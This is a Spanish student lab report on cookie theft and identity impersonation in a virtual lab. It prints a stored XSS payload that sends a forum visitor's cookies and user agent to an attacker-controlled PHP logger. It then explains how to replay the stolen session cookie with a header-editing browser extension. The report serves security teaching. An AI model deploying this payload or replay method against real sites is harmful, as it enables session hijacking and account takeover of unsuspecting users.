2011

SUPLANTACIÓN DE
IDENTIDAD

EDUARDO BAYÓN CASCAJO (Windows XP SERVIDOR-VÍCTIMA)

JAVIER GARCÍA CAMBRONEL (Windows 7 ATACANTE)

Javier García Cambronel y Eduardo bayón Cascajo

SEGUNDO DE ASIR
20/11/2011
 [SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011

ROBO DE COOKIES
CÓDIGO SERVIDOR
CÓDIGO ATACANTE
¿CÓMO CONSIGUE EL ATACANTE ENVIAR
EL PARÁMETRO URL CON LA COOKIE?

SUPLANTACIÓN DE
IDENTIDAD

SEGUNDO DE ASIR Página 1

 [SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011

ROBO DE COOKIES

SUPLANTACIÓN DE IDENTIDAD

En el localhost de la máquina virtual 192.168.1.198/ejer (el sitio

"bueno y/o víctima") tenemos una página web (pagina1.php).
Como vemos en el código hay un inicio de sesión para el único
objeto de guardar una cookie de sesión en el navegador del
usuario y después poder realizar el "robo". Luego el PHP de esta
página lee un archivo foro.txt donde almacena entradas de
mensaje de un hipotético foro. Como es una página de reentrada
de formulario, mira si hay un GET con un mensaje para el foro,
en cuyo caso lo añade al archivo foro.txt. Luego presenta los
mensajes del foro y un formulario para que el usuario envíe un
nuevo mensaje si lo desea.

CÓDIGO SERVIDOR

El atacante por otro lado tiene una página PHP en su sitio 192.168.1.34/ejer
página con el nombre cookies.php que contiene este código:

SEGUNDO DE ASIR Página 2

 [SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011

CÓDIGO ATACANTE

El atacante tiene un archivo de texto que se llama cookies.txt donde va a guardar las
cookies robadas. Intentará enviar las cookies desde el navegador del usuario a través de
un parámetro URL llamado cookies-robadas, por lo que consultará si hay algo en el GET.
Si es así lo graba en el archivo. Luego vuelve a redirigir al usuario a la página del foro del
"sitio bueno".

¿CÓMO CONSIGUE EL ATACANTE ENVIAR EL PARÁMETRO URL CON LA COOKIE?

Pues por ejemplo, enviando este mensaje al foro:

<script type="text/javascript">window.onunload = function(){

document.location = "http://192.168.1.34/ejer/cookies.php?cookies-robadas=" +

document.cookie + "&navegador=" + navigator.userAgent;}</script>

Enviamos el mensaje:

SEGUNDO DE ASIR Página 3

 [SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011

Cuando uno o varios usuarios en el "sitio bueno" pulsen el botón para enviar su mensaje,
entonces éste llegará al localhost de la máquina virtual (servidor) y se guardará con el resto
de mensajes del foro.

Al reenviar el servidor la página otra vez al usuario con su mensaje actualizado en el

foro, se produce un evento window.onunload de la ventana, lo que pone en ejecución el
script inyectado.

Este script hace una redirección al localhost del atacante portando como parámetro URL
todas las cookies del navegador del usuario que tenga almacenadas de la máquina
virtual donde está navegando.

SEGUNDO DE ASIR Página 4

 [SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011

Luego ya en el sitio del atacante queda guardar esas cookies y redirigir a la máquina
virtual sin que el usuario note el proceso. Consiguiendo las ansiadas Cookies.

EMPEZANDO LA SUPLANTACIÓN DE IDENTIDAD UNA VEZ TENEMOS

LA COOKIE
Existe un programa para Firefox, que funciona como una extensión del navegador, que
se puede instalar para tener información sobre las cabeceras del HTTP. El programa se
llama

LiveHttpHeaders y se puede encontrar toda la información, aunque en inglés, en:

http://livehttpheaders.mozdev.org/

En el menú "Herramientas" de Firefox (si no lo encontráis haceros un favor y pulsar la

tecla ALT de vuestro teclado.) se añade una opción llamada "Live HTTP Headers", que
abre una ventana con las cabeceras HTTP que se van enviando y recibiendo a medida
que se navega por los sitios web. Las cabeceras aparecen en tiempo real a medida que se
van generando.

Una opción en la ventana de cabeceras en tiempo real que permite repetir una solicitud
al servidor web, editando las cabeceras del HTTP para cambiarlas tal como nos A
nosotros nos interesa cambiarla claro que sí, con la COOKIE que hemos ROBADO.

Antes nos hemos metido en la página como atacante y nos reconoce como usuario
diciéndonos que nos hemos metido ya en esta página y la hora a la que ha sido.

SEGUNDO DE ASIR Página 5

 [SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011

Antes de la modificación vemos que la información del atacante mostraba era que nos
hemos metido desde el ordenador del atacante el 20 de noviembre de 2011 a las 19:16:10
esa información la lleva la cookie no olvidemos que es un archivo con información (en este
caso la información que tiene del usuario es la hora pero podría ser una contraseña, el
método es el mismo)

Lo que hacemos entonces es insertar el valor de la cookie que hemos robado copiamos el
valor de la cookie el SID en casos en los que este encriptado completamente pues no
deja de ser un valor, pero que nosotros no lo interpretamos fácilmente y es entendible
por el navegador.

SEGUNDO DE ASIR Página 6

 [SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011

Lo pegamos en el lugar correspondiente quedando como vemos en la imagen.

Pulsamos el botón de repetir y PERFECTO ya estamos entrando como si fuéramos la víctima

Hemos terminado haciendo la “SUPLANTACIÓN DE IDENTIDAD” como demuestra la
información en el navegador del atacante.

SEGUNDO DE ASIR Página 7